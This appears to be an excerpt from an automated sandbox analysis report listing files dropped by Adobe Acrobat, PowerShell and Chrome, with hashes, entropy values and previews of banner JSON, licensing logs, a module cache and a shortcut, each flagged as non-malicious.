    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):1164
    Entropy (8bit):5.7009960024086785
    Encrypted:false
    SSDEEP:
    MD5:10309E8A5D8A34CD174456D3BA37D146
    SHA1:FBE0D1806A8789F7BFCB695EAC55BD75FF403C4D
    SHA-256:E82B0BAFA67B5C9EBDF058702FC85488A4222B86328FF6851E8F1631BAE58AFC
    SHA-512:E227F04872CFF59856613C02FCD30CC0683BDC64CDE21659E23B1B9FEFE20791634D9BFA188C33D961989059ABB5A6516385052B0283FB7E6EFC1D22E0309604
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):289
    Entropy (8bit):5.308194825179578
    Encrypted:false
    SSDEEP:
    MD5:368C8A619386F503CE2049B7390CE27A
    SHA1:34984C61807BC27AAB7FA47E52E81E2BF336FC48
    SHA-256:1D222A9368CFEE76428F56162CDC062CD7C9DE3B648DED5350B45A45DAC43204
    SHA-512:EDBAD0039B54A86A0CF4BE1983A43DFD017046F34A0842C9A26F37D25F3AA8012195DA15050990D550A4C2B63FC1E824B5E7B95B0E174809F16C71E1C2202907
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):1395
    Entropy (8bit):5.7802468549203745
    Encrypted:false
    SSDEEP:
    MD5:4686AE9208693D489FB7FC05AA730015
    SHA1:92A87BBFE51564379CA0D9383A5C097C60D70922
    SHA-256:65B5BC7DB3D0F11EDFB3EE834AF20368F1FCE81A5B55ABA878BAA7CFCE1E84DC
    SHA-512:5DD7A5A9519FDDFD89E7D1D1CDDCD4EACB9694C7E283FB2F8A959B76967510F7759D5F74FC64DE789E734F967AFEFF68B120105D3C95E7BE3E057B7EB3FB7538
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):291
    Entropy (8bit):5.291685601030902
    Encrypted:false
    SSDEEP:
    MD5:16620001C692BFA6C067DA68EB2CD234
    SHA1:DBD0FCD74BA4765633153401B9D9DD6848C5EBC1
    SHA-256:962100CAAAFD137E8CC1E2F5B91CADA1AA5562DCD42E10E1CC8B51E076B8048C
    SHA-512:09216EBDBCCC263508743D50C834EE958F73FA9C2733A189759819D63C79A9F9C8EB53FC29831DB9CB590CA90321C46C2DEF2195B66BDBAB3DF68CE1AE0D96E8
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):287
    Entropy (8bit):5.293472248932474
    Encrypted:false
    SSDEEP:
    MD5:60932EA7CF1144CB23B86E01B1CB384B
    SHA1:800731E8C23DE07B94AA0A794A41F158D487E956
    SHA-256:A9798EB37139DA0E2DDA07AF7B27D3867D9DA0D2EB80B491C22EF423A9BE276D
    SHA-512:8979B865CFDB3342629EA7097E81AA5065FE4C583A24D6071C0D84CE2B723A28B5F9A3A80BD260C1C9D3837CB85805B3EA8D3974B446D2A0E0EF2BD826457246
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):1058
    Entropy (8bit):5.6612522747122265
    Encrypted:false
    SSDEEP:
    MD5:3E1DFE075A81C217508F1F7AAE830343
    SHA1:85CA1140720FDB919AE0F54902DA25F1D1E14B33
    SHA-256:56EBA138A6A19FD584AB8399B99118A30713A454E4B502F0B8FC399C9D38FCE5
    SHA-512:5C4A32D88F7865F3CEF3BBE8C44338716B0FBA30BF0A58D43D7AF969EF3403F39EB112D812D55E833F874C171E95D9F611C49D7A29BC0AA317A1B2298388B658
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_3","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"ece07729-7db6-4f20-9f8d-7976ad373049","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IlNlbmQgZG9jdW1lbnRzICYgZm9ybXNcbmZvciBmYXN0IGUtc2lnbmluZyBvbmxpbmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme"
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):286
    Entropy (8bit):5.267990466783581
    Encrypted:false
    SSDEEP:
    MD5:9A44D433BE43F442AF99248BE8C0D76A
    SHA1:0D2995F01193810F3F56B455446DDCF8CF98B355
    SHA-256:AEB2055ED530A4189901E37EBFA0E94F4695C470EAF5C99AC151C0B31B52C9B6
    SHA-512:0E9085D607EEE7483EAB771FC426A13C741DCACC05686BB66598E40BF3F1C111840384AA8979AA153E907E8360060A74F5010786B3DF117E648C2F882E379367
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):782
    Entropy (8bit):5.376647300197172
    Encrypted:false
    SSDEEP:
    MD5:413A472EDAE7E748A9A1FF794DE3F845
    SHA1:104AA27CFF973959DACB9AC23F3F3E42F2D5181F
    SHA-256:CFD497B9E5F16B1C3215995A2F845D5685E2EECF41EE70EE40D09049D18A9B4D
    SHA-512:135708F790A698471AB7C5DA1E9759EF43CC307DB83211A39E050CD6DA1847E680273D10851F515F274125B935E852DDEB93619DA623B671316942DD5AC39F09
    Malicious:false
    Reputation:unknown
    Preview:{"analyticsData":{"responseGUID":"f4164c77-8587-4aa0-bff3-787ebd1bdd59","sophiaUUID":"94B2C178-E1F7-4D12-8BEA-76F4017C8DA0"},"encodingScheme":true,"expirationDTS":1723643183011,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1723465283044}}}}
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:data
    Category:dropped
    Size (bytes):4
    Entropy (8bit):0.8112781244591328
    Encrypted:false
    SSDEEP:
    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
    Malicious:false
    Reputation:unknown
    Preview:....
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:JSON data
    Category:dropped
    Size (bytes):2818
    Entropy (8bit):5.141470879548768
    Encrypted:false
    SSDEEP:
    MD5:4E4CB5765445BEDE00B7DEC4B3BC3EA1
    SHA1:6BAA4AA15F9FD7E8F52AEFD0F96C2CA430905007
    SHA-256:6E1EE2B267DE57CEE5D4FB510952C6227FBD56B8326D0C00F8AC4A808539D5E8
    SHA-512:89FE9079E9460E5070B7CCBCF8EA7E54677C3E01D006BEE4C3E58BA08C3AAB123513D7B3F825260689B38F38941772DEB12B6F8E6FDD9A56898FD6D34AE1AF5C
    Malicious:false
    Reputation:unknown
    Preview:{"all":[{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"025d837ba89f516328b7c2e744af553d","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1723465282000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"f4ab023ee6c4a0fe735438e3bdfdc0d8","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1058,"ts":1723465282000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"5c9a2c62d751e8790d3b4b8395febccf","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1063,"ts":1723465282000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"213bb49f7526fa735ddb521a780e4fac","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1723465282000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"5c974bef33926d1eb72ebd497570fd15","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1723465282000},{"id":"Edit_InApp_Aug2020","info":{"dg":"6df51d571aeae772481a413ba241dca9","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 23, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 23
    Category:dropped
    Size (bytes):12288
    Entropy (8bit):1.3568523455436003
    Encrypted:false
    SSDEEP:
    MD5:7F8132FC8B5737C737E1F2BB5153BE6A
    SHA1:7C9F29E4CECECFE776A577C660102353CC79353F
    SHA-256:515DABED002EBD3A98E750291F3DD964C9533B543C3722106079F76A67C0B14B
    SHA-512:681D762AEDF719CD0196D5D53A877A4E025EE6307EFBA93C5FA7F26BB0D5C7D52DCA4D8035A6038573260E75A467CFD82EF7B3B29F1BEFC1F7274C98120501E8
    Malicious:false
    Reputation:unknown
    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:SQLite Rollback Journal
    Category:dropped
    Size (bytes):8720
    Entropy (8bit):1.828662699742841
    Encrypted:false
    SSDEEP:
    MD5:52A38EC18520209DF2C579318F774A7F
    SHA1:A59470D77F65EC0330D7A290856AB953FBA75F92
    SHA-256:7C89F9B7291C1F99B903002BF1660ED142E859F3DDD443F3CAC3477FF9D8269E
    SHA-512:40CF24F6EF41427F53C518D477EC44DC9E3271356B227497BBC312C003DF7CE4C11F1D864BDBB30CB3C53E0256A9249AF616F93154C05B8E0543DBF332921E8B
    Malicious:false
    Reputation:unknown
    Preview:.... .c.....NTv.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././.-.-.-.-.-.-.-.-.-.-.-.-.-.-........................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:modified
    Size (bytes):9434
    Entropy (8bit):4.928515784730612
    Encrypted:false
    SSDEEP:
    MD5:D3594118838EF8580975DDA877E44DEB
    SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
    SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
    SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
    Malicious:false
    Reputation:unknown
    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):15856
    Entropy (8bit):5.439693511842953
    Encrypted:false
    SSDEEP:
    MD5:1D01D155FB7212253E6AEC07B05CC900
    SHA1:6912A90BA2B7090DCA98703E006A0D55572BFBFB
    SHA-256:133B9BC981454DDF9BD638D1DA20300C36A02927857E92A07F6016E88C3275F5
    SHA-512:2E4753C556BC2C80281E5D65F7344684F08216FBA8DD6B638E77541C3AFA739820EA66E96AC1E9AD4F78C8EB947105DDB3D5F5792616B73550DC73D1DCA601C7
    Malicious:false
    Reputation:unknown
    Preview:@...e...........h....................................@..........H...............o..b~.D.poM...C..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.2.....%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
    Category:dropped
    Size (bytes):246
    Entropy (8bit):3.5085442896850614
    Encrypted:false
    SSDEEP:
    MD5:7E86D7C81EAF83603F036D197B53D969
    SHA1:AC6FAC5448804B78276C2BDC9E65F61DEF39838D
    SHA-256:3EE26459A4DCD9924B8807947CC8EC25FE023B2D7D1B4344FADDC3C99252A066
    SHA-512:D2AF1AA932214C6C7EA37CF3CFFDFE2F7C9B41D7A646819B698B11F91FACC07F316DE43681DFB6D75F0C571AB8C75E8039C42595716CCEFE85A76BA41BB06697
    Malicious:false
    Reputation:unknown
    Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.2./.0.8./.2.0.2.4. . .0.8.:.2.1.:.2.3. .=.=.=.....
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):60
    Entropy (8bit):4.038920595031593
    Encrypted:false
    SSDEEP:
    MD5:D17FE0A3F47BE24A6453E9EF58C94641
    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
    Malicious:false
    Reputation:unknown
    Preview:# PowerShell test file to determine AppLocker lockdown mode
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:ASCII text, with very long lines (393)
    Category:dropped
    Size (bytes):16525
    Entropy (8bit):5.359827924713262
    Encrypted:false
    SSDEEP:
    MD5:06DEAEDB81D09FD8FB5FF668D8E09CB2
    SHA1:28A02BCBD5975117B97A08AFB049F2C94F334726
    SHA-256:D98DE785425112A2D7A41B16073812FA4FA4955F2D5139AE87C9A5FBC4717D64
    SHA-512:948E3B56E5A8D818A5FE9D74B82A898F7264909ADF2C49E5D096CB90F4D28ED95990545A4857933F0E06D493AA0F6D41F6109C74B44BC0E4B84346B519681936
    Malicious:false
    Reputation:unknown
    Preview:SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:755+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=c98ebd97-9477-4d7e-bd0c-12efa5f01bab.1696586972755 Timestamp=2023-10-06T12:09:32:756+0200 ThreadID=6536 Component=ngl-lib_NglAppLib Description="SetConfig:
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:ASCII text, with very long lines (393), with CRLF line terminators
    Category:dropped
    Size (bytes):16603
    Entropy (8bit):5.3608244541180605
    Encrypted:false
    SSDEEP:
    MD5:E0D728EDD5BD2AD661E787666F021544
    SHA1:578E0C1B138DE8213A125B3523A85245F554C22B
    SHA-256:49CD9FB6993865905F7806C3B923214B93213FA479096293407D62D586BBFB9C
    SHA-512:DF7CAEF3BFFCFE7A161383EA55CA144268B8257BB0686501F8BE77CFC59229D1871784BA82D6A27CB50155F8CC3779D233292116A20AE662BA30ECBA3343DE2D
    Malicious:false
    Reputation:unknown
    Preview:SessionID=ab3bb0c4-89ce-4a7f-ac85-dc12bbc143a6.1723465277857 Timestamp=2024-08-12T08:21:17:857-0400 ThreadID=7688 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=ab3bb0c4-89ce-4a7f-ac85-dc12bbc143a6.1723465277857 Timestamp=2024-08-12T08:21:17:859-0400 ThreadID=7688 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=ab3bb0c4-89ce-4a7f-ac85-dc12bbc143a6.1723465277857 Timestamp=2024-08-12T08:21:17:859-0400 ThreadID=7688 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=ab3bb0c4-89ce-4a7f-ac85-dc12bbc143a6.1723465277857 Timestamp=2024-08-12T08:21:17:859-0400 ThreadID=7688 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=ab3bb0c4-89ce-4a7f-ac85-dc12bbc143a6.1723465277857 Timestamp=2024-08-12T08:21:17:859-0400 ThreadID=7688 Component=ngl-lib_NglAppLib Description="SetConf
    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):35814
    Entropy (8bit):5.421976472535337
    Encrypted:false
    SSDEEP:
    MD5:CE7A60CBCC796B515E9DC1A766A9BF09
    SHA1:9B68B4DA53DFF4916A9E5C69A68CD9C6F5BD3A2D
    SHA-256:4237097B080F8CB752434554DC2CACE1989C85FEDE047D361141187929CC2ECF
    SHA-512:4FA44BE76D057C28299E8E2B090D1B1359FE94BC4012942B6D216AC775D8504C6658386137EF5D5129AF52243EDDBE75D5B59F4BBF722668A28FA95BFD131118
    Malicious:false
    Reputation:unknown
    Preview:06-10-2023 11:44:59:.---2---..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 11:44:59:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 11:44:59:.Closing File..06-10-
    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Aug 12 11:20:52 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
    Category:dropped
    Size (bytes):2677
    Entropy (8bit):3.986157315805212
    Encrypted:false
    SSDEEP:
    MD5:71C0A649405962F354EBEFE9F71D1664
    SHA1:760D7CC8868EFBC7F8F68F4680A61162C6BE981E
    SHA-256:EF267AFF3E75991A2EB64C6AB2A3659CEB0148BED6FB544EF2156156AC3FA9D0
    SHA-512:ECD516641A14960510E3F66ACD346BFD83C532CD28FB01C9667E4A9291D139C13AA1FB3F08F3C8E8FB4E936D38584F61B1E7F0B82ABB06B08B5D4C445B5DD65B
    Malicious:false
    Reputation:unknown
    Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.b....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.b....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.b....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.b...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.b...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............O......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. 